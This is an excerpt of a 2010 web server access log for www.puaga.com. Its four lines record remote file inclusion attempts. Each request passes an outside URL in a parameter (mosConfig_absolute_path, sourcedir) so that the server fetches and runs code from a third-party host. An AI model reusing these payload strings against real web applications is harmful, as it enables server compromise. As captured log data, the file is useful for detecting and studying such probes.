58.150.99.144 - - [15/Feb/2010:08:31:03 -0800] "GET /logs/access_100107.log%20%20///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:31:03 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:31:03 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:31:07 -0800] "GET /logs/access_100114.log//games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
